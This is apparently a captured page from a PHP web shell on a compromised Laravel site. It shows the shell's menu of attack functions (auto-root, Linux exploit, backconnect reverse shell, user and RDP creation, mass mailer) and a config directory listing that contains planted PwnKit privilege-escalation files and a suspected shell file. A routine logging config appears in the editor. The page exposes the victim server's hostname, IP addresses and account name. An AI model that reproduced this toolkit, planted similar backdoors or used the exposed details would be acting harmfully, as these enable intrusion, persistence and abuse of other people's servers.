Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.216.164
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechdemo5.com /
config /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
iosCertificates
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
api.php
1.03
KB
-rw-r--r--
app.php
10.93
KB
-rw-r--r--
auth.php
3.74
KB
-rw-r--r--
backup.php
9.11
KB
-rw-r--r--
broadcasting.php
2.21
KB
-rw-r--r--
cache.php
3.07
KB
-rw-r--r--
cashier.php
4.96
KB
-rw-r--r--
cors.php
1.09
KB
-rw-r--r--
database.php
4.99
KB
-rw-r--r--
datatables-buttons.php
2.22
KB
-rw-r--r--
datatables-html.php
719
B
-rw-r--r--
debugbar.php
8.49
KB
-rw-r--r--
dompdf.php
11.14
KB
-rw-r--r--
entrust.php
5.13
KB
-rw-r--r--
entrust_seeder.php
560
B
-rw-r--r--
error_log
15.56
KB
-rw-r--r--
excel.php
11.97
KB
-rw-r--r--
filesystems.php
4.49
KB
-rw-r--r--
flutterwave.php
749
B
-rw-r--r--
fortify.php
4.74
KB
-rw-r--r--
froiden_envato.php
1.79
KB
-rw-r--r--
goat1.php
143.87
KB
-rw-r--r--
hashing.php
1.53
KB
-rw-r--r--
imap.php
7.79
KB
-rw-r--r--
installer.php
1.29
KB
-rw-r--r--
laravel-device-tracking.php
785
B
-rw-r--r--
laravel_google_translate.php
552
B
-rw-r--r--
location.php
3.59
KB
-rw-r--r--
log-viewer.php
7.05
KB
-rw-r--r--
logcleaner.php
907
B
-rw-r--r--
logging.php
2.93
KB
-rw-r--r--
mail.php
3.45
KB
-rw-r--r--
modules.php
10.41
KB
-rw-r--r--
mollie.php
1.93
KB
-rw-r--r--
onesignal.php
537
B
-rw-r--r--
payfast.php
1.37
KB
-rw-r--r--
paystack.php
724
B
-rw-r--r--
pushnotification.php
530
B
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
queue.php
3.37
KB
-rw-r--r--
sanctum.php
2.24
KB
-rw-r--r--
sentry.php
1.7
KB
-rw-r--r--
services.php
3.07
KB
-rw-r--r--
session.php
6.88
KB
-rw-r--r--
translation-manager.php
1.45
KB
-rw-r--r--
view.php
1.03
KB
-rw-r--r--
xss_ignore.php
461
B
-rw-r--r--
zoom.php
443
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : logging.php
<?php use Monolog\Handler\NullHandler; use Monolog\Handler\StreamHandler; use Monolog\Handler\SyslogUdpHandler; return [ /* |-------------------------------------------------------------------------- | Default Log Channel |-------------------------------------------------------------------------- | | This option defines the default log channel that gets used when writing | messages to the logs. The name specified in this option should match | one of the channels defined in the "channels" configuration array. | */ 'default' => env('LOG_CHANNEL', 'daily'), /* |-------------------------------------------------------------------------- | Log Channels |-------------------------------------------------------------------------- | | Here you may configure the log channels for your application. Out of | the box, Laravel uses the Monolog PHP logging library. This gives | you a variety of powerful log handlers / formatters to utilize. | | Available Drivers: "single", "daily", "slack", "syslog", | "errorlog", "monolog", | "custom", "stack" | */ 'channels' => [ 'stack' => [ 'driver' => 'stack', 'channels' => ['single'], 'ignore_exceptions' => false, ], 'single' => [ 'driver' => 'single', 'path' => storage_path('logs/laravel.log'), 'level' => env('LOG_LEVEL', 'debug'), ], 'daily' => [ 'driver' => 'daily', 'path' => storage_path('logs/laravel.log'), 'level' => env('LOG_LEVEL', 'debug'), 'days' => 14, ], 'slack' => [ 'driver' => 'slack', 'url' => env('LOG_SLACK_WEBHOOK_URL'), 'username' => 'Laravel Log', 'emoji' => ':boom:', 'level' => env('LOG_LEVEL', 'critical'), ], 'papertrail' => [ 'driver' => 'monolog', 'level' => env('LOG_LEVEL', 'debug'), 'handler' => SyslogUdpHandler::class, 'handler_with' => [ 'host' => env('PAPERTRAIL_URL'), 'port' => env('PAPERTRAIL_PORT'), ], ], 'stderr' => [ 'driver' => 'monolog', 'handler' => StreamHandler::class, 'formatter' => env('LOG_STDERR_FORMATTER'), 'with' => [ 'stream' => 'php://stderr', ], ], 'syslog' => [ 'driver' => 'syslog', 'level' => env('LOG_LEVEL', 'debug'), ], 'errorlog' => [ 'driver' => 'errorlog', 'level' => env('LOG_LEVEL', 'debug'), ], 'null' => [ 'driver' => 'monolog', 'handler' => NullHandler::class, ], 'emergency' => [ 'path' => storage_path('logs/laravel.log'), ], ], ];
Close